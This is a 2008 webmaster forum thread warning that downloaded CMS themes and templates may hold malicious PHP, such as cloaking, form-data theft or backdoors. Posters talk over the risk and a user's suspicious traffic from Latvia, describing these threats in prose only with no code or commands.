1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Before You Download A Theme or Template

Discussion in 'Content Management' started by ltdraper, Jan 30, 2008.

?

Are there security concerns with downloaded templates?

  1. What's PHP?

    0 vote(s)
    0.0%
  2. Minor problem

    0 vote(s)
    0.0%
  3. No problem, I just read through the code

    2 vote(s)
    100.0%
  4. Yes, a huge problem

    0 vote(s)
    0.0%
  1. #1
    Do you read through the source code of themes and templates you install on your CMS? Do you feel that you can read and understand the php code in a template? Did you even know that themes and templates have php code that has complete access to your server as the Apache user?

    What if you found out that your template was doing a few of these things?

    1> Cloak your pages so that it looks normal to everyone except the search engine bots. They get shown a page of spammy links.

    2> Implement an Ajax based function that sends any form data entered (for example, login and passwords from the comments) to an external web site.

    3> Cloak your pages so that they look fine to you, but it someone enters the page on a search engine they get a different page with the evil template developer's adsense

    4> Watch the IP addresses that view the pages (phone home) and make a good guess as to which addresses are probably the owner. Cloak the pages so that the site owner sees their own content, but everyone else see's the template developer's content.

    I put together a list of 10 of these scenarios on my blog (Promote-my-site.com) and would be interested to see some discussion of whether people think this is a serious threat.
     
    ltdraper, Jan 30, 2008 IP
  2. PinkyRing

    PinkyRing Member

    Messages:
    35
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    41
    #2
    Interesting. I just happened to check my stats and saw an ip address from Latvia accessing my site consistently. I am using a free template from Joomlart, which I had considered safe. Do you think it could be phoning home?
     
    PinkyRing, Jan 30, 2008 IP
  3. ltdraper

    ltdraper Peon

    Messages:
    30
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    0
    #3
    That could be, although it's more likely a scraper grabbing content to then randomize and put on a splog somewhere. But one thing a theme could do is install a backdoor so that when a certain IP accesses the site they get different information, such as a list of the email addresses in jos_users.

    Or maybe you've just got a fan in Latvia.

    If you're really freaked out, PM me and we'll arrange for me to take a quick look at your template. I'd be interested to find one of these evil templates in the wild.
     
    ltdraper, Jan 30, 2008 IP
  4. PinkyRing

    PinkyRing Member

    Messages:
    35
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    41
    #4
    What I did was blocked that ip, I dont really think I have fans in Latvia. Are you familiar with joomlart, they are "recommended" by joomla I guess. Do you think they would risk their business by inserting a backdoor to a site?

    I'm not necessarily freaked out, but curious about this sudden amount of traffic from latvia, so I am hoping joomlart can be trusted.

    Thanks for the advice, if i feel there is something suspicious going on from now I'll PM you.

    thanks
     
    PinkyRing, Jan 30, 2008 IP
  5. ltdraper

    ltdraper Peon

    Messages:
    30
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    0
    #5
    No, but the possibility exists that they were hacked and somebody put a backdoor into their template. Or more likely the two have nothing to do with each other and you were just a victim of a probe.
     
    ltdraper, Jan 30, 2008 IP